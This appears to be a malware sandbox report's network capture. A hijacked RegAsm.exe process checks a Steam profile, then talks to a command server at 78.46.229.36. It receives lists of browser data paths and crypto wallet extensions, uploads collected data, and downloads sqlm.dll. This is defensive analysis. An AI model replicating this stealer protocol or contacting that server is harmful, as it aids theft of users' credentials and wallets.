                                                                                                                                                                                                                                                  Mar 29, 2024 12:08:27.279844999 CET4434976678.46.229.36192.168.2.4
                                                                                                                                                                                                                                                  Mar 29, 2024 12:08:27.279947042 CET49766443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:08:27.280128002 CET49766443192.168.2.478.46.229.36
                                                                                                                                                                                                                                                  Mar 29, 2024 12:08:27.280142069 CET4434976678.46.229.36192.168.2.4

                                                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:51.430758953 CET5702153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:51.525804043 CET53570211.1.1.1192.168.2.4

                                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:51.430758953 CET192.168.2.41.1.1.10x9c98Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Mar 29, 2024 12:07:51.525804043 CET1.1.1.1192.168.2.40x9c98No error (0)steamcommunity.com104.112.44.153A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                                  • steamcommunity.com
                                                                                                                                                                                                                                                  • 78.46.229.36

                                                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  0192.168.2.449731104.112.44.1534437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:07:51 UTC119OUTGET /profiles/76561199658817715 HTTP/1.1
                                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:07:52 UTC1882INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:07:52 GMT
                                                                                                                                                                                                                                                  Content-Length: 34657
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: sessionid=b8124e20d16c3d1e96e169c7; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C4501bef07644d0152615a97beef5c423; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                  2024-03-29 11:07:52 UTC14502INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                                  2024-03-29 11:07:52 UTC10074INData Raw: 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 41 63 63 6f 75 6e 74 20 4d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 5f 69 6e 73 74 61 6c 6c 73 74 65 61 6d 5f 62 74 6e 20 68 65 61 64 65 72 5f 69 6e 73 74 61
                                                                                                                                                                                                                                                  Data Ascii: '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" aria-label="Account Menu"><a class="header_installsteam_btn header_insta
                                                                                                                                                                                                                                                  2024-03-29 11:07:52 UTC10081INData Raw: 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6f 6d 6d 75 6e 69 74 79 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 70 75 62 6c 69 63 5c 2f 73 68 61 72 65 64 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 48 41 54 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71
                                                                                                                                                                                                                                                  Data Ascii: :\/\/store.cloudflare.steamstatic.com\/&quot;,&quot;PUBLIC_SHARED_URL&quot;:&quot;https:\/\/community.cloudflare.steamstatic.com\/public\/shared\/&quot;,&quot;COMMUNITY_BASE_URL&quot;:&quot;https:\/\/steamcommunity.com\/&quot;,&quot;CHAT_BASE_URL&quot;:&q


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  1192.168.2.44973278.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:07:52 UTC218OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:07:53 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:07:53 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-03-29 11:07:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  2192.168.2.44973678.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:07:53 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAEC
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Content-Length: 279
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:07:53 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 43 33 36 34 32 33 32 31 33 30 31 33 39 39 36 30 39 33 33 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 30 30 32 37 65 33 35 66 36 63 62 35 34 38 34 38 30 61 36 66 62 38 62 64 37 63 64 65 30 63 66 0d 0a 2d 2d 2d 2d 2d 2d
                                                                                                                                                                                                                                                  Data Ascii: ------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="hwid"D9C3642321301399609336-a33c7340-61ca-11ee-8c18-806e6f6e6963------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------
                                                                                                                                                                                                                                                  2024-03-29 11:07:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:07:54 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-03-29 11:07:54 UTC67INData Raw: 33 38 0d 0a 31 7c 31 7c 31 7c 30 7c 61 35 35 36 35 65 31 35 33 31 36 35 34 35 38 37 38 33 39 37 39 66 38 39 31 35 63 65 38 31 65 30 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 381|1|1|0|a5565e153165458783979f8915ce81e0|1|1|1|0|0|500000


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  3192.168.2.44974078.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:07:54 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCF
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:07:54 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 35 35 36 35 65 31 35 33 31 36 35 34 35 38 37 38 33 39 37 39 66 38 39 31 35 63 65 38 31 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 30 30 32 37 65 33 35 66 36 63 62 35 34 38 34 38 30 61 36 66 62 38 62 64 37 63 64 65 30 63 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------JKJDAEBFCBKECBGDBFCFContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------JKJDAEBFCBKECBGDBFCFContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------JKJDAEBFCBKECBGDBFCFCont
                                                                                                                                                                                                                                                  2024-03-29 11:07:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:07:55 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-03-29 11:07:55 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                                                                  Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  4192.168.2.44974178.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:07:55 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJK
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:07:55 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 35 35 36 35 65 31 35 33 31 36 35 34 35 38 37 38 33 39 37 39 66 38 39 31 35 63 65 38 31 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 30 30 32 37 65 33 35 66 36 63 62 35 34 38 34 38 30 61 36 66 62 38 62 64 37 63 64 65 30 63 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------KEGIDHJKKJDGCBGCGIJKCont
                                                                                                                                                                                                                                                  2024-03-29 11:07:56 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:07:56 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-03-29 11:07:56 UTC5165INData Raw: 31 34 32 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                  Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  5192.168.2.44974378.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:07:57 UTC311OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDB
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Content-Length: 7117
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:07:57 UTC7117OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 35 35 36 35 65 31 35 33 31 36 35 34 35 38 37 38 33 39 37 39 66 38 39 31 35 63 65 38 31 65 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 30 30 32 37 65 33 35 66 36 63 62 35 34 38 34 38 30 61 36 66 62 38 62 64 37 63 64 65 30 63 66 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------IIJDBGDGCGDAKFIDGIDBContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------IIJDBGDGCGDAKFIDGIDBContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------IIJDBGDGCGDAKFIDGIDBCont
                                                                                                                                                                                                                                                  2024-03-29 11:07:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:07:57 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-03-29 11:07:57 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  6192.168.2.44974678.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:07:58 UTC226OUTGET /sqlm.dll HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:07:58 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:07:58 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 2459136
                                                                                                                                                                                                                                                  Last-Modified: Mon, 25 Mar 2024 09:53:07 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  ETag: "66014983-258600"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  2024-03-29 11:07:58 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
